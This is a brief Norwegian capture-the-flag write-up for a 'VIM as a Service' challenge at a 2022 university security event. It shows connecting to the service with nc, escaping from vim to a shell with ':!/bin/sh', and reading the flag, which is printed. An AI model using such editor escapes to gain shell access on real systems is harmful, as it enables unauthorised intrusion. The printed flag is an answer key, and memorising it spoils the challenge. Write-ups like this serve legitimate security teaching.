View on GitHub

Sikkerhetsdagen 2022 CTF @ UiA

VaaS

VaaS

Som innovatorene vi er så hard vi lansert VaaS! (VIM as a Service)!

ctf.uiactf.no:5007


Når vi kobler til serveren blir vi presentert med vim som forventet.

$ nc ctf.uiactf.no 5007

~
~
~
~
~               VIM - Vi IMproved
~
~                version 8.2.2434
~              by Bram Moolenaar et al.
~          Modified by team+vim@tracker.debian.org
~         Vim is open source and freely distributable
~
~            Help poor children in Uganda!
~        type :help iccf<Enter>    for information
~
~        type :q<Enter>        to exit
~        type :help<Enter> or <F1> for on-line help
~        type :help version8<Enter>  for version info
~
~
~
~
~
                               0,0-1     All

vim har inebygget støtte for å kjøre kommandoer. Det vil si at vi kan kjøre /bin/sh for å spawne et shell.

Mer om dette her: https://gtfobins.github.io/gtfobins/vim/

:!/bin/sh
ls
flag.txt
cat flag.txt
UIACTF{flyktet_fra_vim!}

Flagg

UIACTF{flyktet_fra_vim!}